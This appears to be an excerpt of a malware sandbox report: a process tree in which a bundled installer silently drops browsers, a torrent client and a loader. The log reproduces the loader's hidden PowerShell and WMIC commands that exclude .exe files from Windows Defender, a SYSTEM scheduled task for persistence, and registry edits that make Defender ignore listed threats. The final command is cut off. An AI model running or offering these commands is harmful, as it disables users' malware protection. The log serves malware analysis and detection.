C:\Users\Admin\AppData\Local\Temp\is-8U4C5.tmp\Izaw0OcctowNceUeU.tmp"C:\Users\Admin\AppData\Local\Temp\is-8U4C5.tmp\Izaw0OcctowNceUeU.tmp" /SL5="$302A6,5349763,721408,C:\Users\Admin\AppData\Local\Temp\8LFrg6Ok\Izaw0OcctowNceUeU.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:396 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause shine-encoder_111516⤵PID:3004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause shine-encoder_111517⤵PID:2708
-
-
-
C:\Users\Admin\AppData\Local\Shine Encoder 3.5.4\shineencoder.exe"C:\Users\Admin\AppData\Local\Shine Encoder 3.5.4\shineencoder.exe" -i6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:856
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22444⤵
- Program crash
PID:1376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22644⤵
- Program crash
PID:928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22124⤵
- Program crash
PID:3320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22644⤵
- Program crash
PID:1500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\uEKegsqV\6OOwtsS.exe"4⤵PID:3460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\uEKegsqV\6OOwtsS.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22644⤵
- Program crash
PID:4876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22524⤵
- Program crash
PID:2704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 21044⤵
- Program crash
PID:2352
-
-
C:\Users\Admin\AppData\Local\Temp\uEKegsqV\6OOwtsS.exeC:\Users\Admin\AppData\Local\Temp\uEKegsqV\6OOwtsS.exe --silent --allusers=04⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3252 -
C:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exe --silent --allusers=0 --server-tracking-blob=ZTczMmYxZDI2ZTlkOGYzNGJkY2I3YTJlODcxMTE1OTViMWE5Y2NmYzg0MDM1ZDA5ZmFkZWQzNjJiY2RiZjAwNzp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFHWFNldHVwLmV4ZSIsInByb2R1Y3QiOiJvcGVyYV9neCIsInF1ZXJ5IjoiL29wZXJhX2d4L3N0YWJsZS9lZGl0aW9uL3N0ZC0yLz91dG1fc291cmNlPU9GVCZ1dG1fbWVkaXVtPXBiJnV0bV9jYW1wYWlnbj1vZ3gmJnV0bV9jb250ZW50PTM1MzE4IiwidGltZXN0YW1wIjoiMTczMTY0NjY1Ny43MDc3IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib2d4IiwiY29udGVudCI6IjM1MzE4IiwibWVkaXVtIjoicGIiLCJzb3VyY2UiOiJPRlQifSwidXVpZCI6IjBiZTdkYWQ2LTBlODgtNDFkZS1hZGVlLTMyMjZiYTE4MGU1MSJ95⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:4588 -
C:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=114.0.5282.202 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x71758c5c,0x71758c68,0x71758c746⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1864
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2564
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --vought_browser=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=4588 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20241115045742" --session-guid=7e500a53-e0bf-4555-b8be-aad75f9f3394 --server-tracking-blob=MmUwNzM4Y2QzMzU3YTMyMzg5ZmFmMTMwMDJhODRkNzY0NjI5MzQ0MzQwNjFkMzU2MGFlZWUwNmFiZDNkNWY0ZTp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFHWFNldHVwLmV4ZSIsInByb2R1Y3QiOnsibmFtZSI6Im9wZXJhX2d4In0sInF1ZXJ5IjoiL29wZXJhX2d4L3N0YWJsZS9lZGl0aW9uL3N0ZC0yLz91dG1fc291cmNlPU9GVCZ1dG1fbWVkaXVtPXBiJnV0bV9jYW1wYWlnbj1vZ3gmJnV0bV9jb250ZW50PTM1MzE4Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMxNjQ2NjU3LjcwNzciLCJ1c2VyYWdlbnQiOiJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTE4LjAuMC4wIFNhZmFyaS81MzcuMzYiLCJ1dG0iOnsiY2FtcGFpZ24iOiJvZ3giLCJjb250ZW50IjoiMzUzMTgiLCJtZWRpdW0iOiJwYiIsInNvdXJjZSI6Ik9GVCJ9LCJ1dWlkIjoiMGJlN2RhZDYtMGU4OC00MWRlLWFkZWUtMzIyNmJhMTgwZTUxIn0= --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=98050000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=114.0.5282.202 --initial-client-data=0x338,0x33c,0x340,0x308,0x344,0x70928c5c,0x70928c68,0x70928c747⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3260
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"6⤵
- Executes dropped EXE
PID:2956
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4032 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x2a4,0x2a8,0x2ac,0x280,0x2b0,0x324f48,0x324f58,0x324f647⤵
- Executes dropped EXE
PID:3292
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22524⤵
- Program crash
PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\zONamexw\0VWXDTifa42.exe"4⤵PID:5108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\zONamexw\0VWXDTifa42.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 12404⤵
- Program crash
PID:3128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 20204⤵
- Program crash
PID:4184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exe"4⤵PID:2772
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 20724⤵
- Program crash
PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\zONamexw\0VWXDTifa42.exeC:\Users\Admin\AppData\Local\Temp\zONamexw\0VWXDTifa42.exe /VERYSILENT4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3396 -
C:\Users\Admin\AppData\Local\Temp\is-43QLM.tmp\0VWXDTifa42.tmp"C:\Users\Admin\AppData\Local\Temp\is-43QLM.tmp\0VWXDTifa42.tmp" /SL5="$503C6,2448307,138752,C:\Users\Admin\AppData\Local\Temp\zONamexw\0VWXDTifa42.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2860 -
C:\ProgramData\uTorrent\utorrent9.exe"C:\ProgramData\uTorrent\utorrent9.exe" /VERYSILENT6⤵
- Executes dropped EXE
PID:4736 -
C:\Users\Admin\AppData\Local\Temp\is-I0KS4.tmp\utorrent9.tmp"C:\Users\Admin\AppData\Local\Temp\is-I0KS4.tmp\utorrent9.tmp" /SL5="$403E0,832512,832512,C:\ProgramData\uTorrent\utorrent9.exe" /VERYSILENT7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1172
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 18924⤵
- Program crash
PID:400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22564⤵
- Program crash
PID:4644
-
-
C:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exeC:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:4948 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
- Indirect Command Execution
PID:768 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:3600
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhzAbyJhiYArNEwhRY" /SC once /ST 04:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exe\" Y8 /NBididel 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 14405⤵
- Program crash
PID:196
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 18924⤵
- Program crash
PID:1800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 14564⤵
- Program crash
PID:3060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22644⤵
- Program crash
PID:1444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 15884⤵
- Program crash
PID:3312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 11084⤵
- Program crash
PID:4192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 19204⤵
- Program crash
PID:4876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 12524⤵
- Program crash
PID:3128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 10924⤵
- Program crash
PID:6000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 17364⤵
- Program crash
PID:5188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 21924⤵
- Program crash
PID:5928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 21804⤵
- Program crash
PID:5540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 21484⤵
- Program crash
PID:436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 19644⤵
- Program crash
PID:4632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 11684⤵PID:232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22804⤵PID:4428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 20844⤵PID:2700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22764⤵PID:2136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 23124⤵PID:5420
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 21564⤵PID:2564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22924⤵PID:3048
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22764⤵PID:6108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 23084⤵PID:4324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22684⤵PID:692
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1460 -ip 14601⤵PID:1468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 14601⤵PID:3444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1460 -ip 14601⤵PID:3824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1460 -ip 14601⤵PID:4476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1460 -ip 14601⤵PID:1632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1460 -ip 14601⤵PID:1424
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1460 -ip 14601⤵PID:2704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1460 -ip 14601⤵PID:4576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1460 -ip 14601⤵PID:2020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1460 -ip 14601⤵PID:5108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1460 -ip 14601⤵PID:3264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 14601⤵PID:2992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1460 -ip 14601⤵PID:4388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1460 -ip 14601⤵PID:4736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1460 -ip 14601⤵PID:784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1460 -ip 14601⤵PID:3384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1460 -ip 14601⤵PID:4192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1460 -ip 14601⤵PID:4732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1460 -ip 14601⤵PID:1568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1460 -ip 14601⤵PID:1856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1460 -ip 14601⤵PID:3992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1460 -ip 14601⤵PID:1444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1460 -ip 14601⤵PID:928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1460 -ip 14601⤵PID:4432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1460 -ip 14601⤵PID:1052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1460 -ip 14601⤵PID:652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1460 -ip 14601⤵PID:3516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 14601⤵PID:4580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1460 -ip 14601⤵PID:1696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1460 -ip 14601⤵PID:3312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1460 -ip 14601⤵PID:4200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1460 -ip 14601⤵PID:1516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1460 -ip 14601⤵PID:1360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 14601⤵PID:4244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1460 -ip 14601⤵PID:1656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1460 -ip 14601⤵PID:3728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1460 -ip 14601⤵PID:2112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1460 -ip 14601⤵PID:652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1460 -ip 14601⤵PID:1468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1460 -ip 14601⤵PID:2760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1460 -ip 14601⤵PID:3124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1460 -ip 14601⤵PID:3480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1460 -ip 14601⤵PID:4908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1460 -ip 14601⤵PID:4484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 14601⤵PID:332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1460 -ip 14601⤵PID:2640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1460 -ip 14601⤵PID:340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 1460 -ip 14601⤵PID:3892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 14601⤵PID:2040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1460 -ip 14601⤵PID:3744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1460 -ip 14601⤵PID:2000
-
C:\Program Files\qBittorrent\qbittorrent.exe"C:\Program Files\qBittorrent\qbittorrent.exe" "C:\Users\Admin\Documents\the-longing-codex.torrent"1⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:3080
-
C:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exeC:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exe Y8 /NBididel 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5824 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 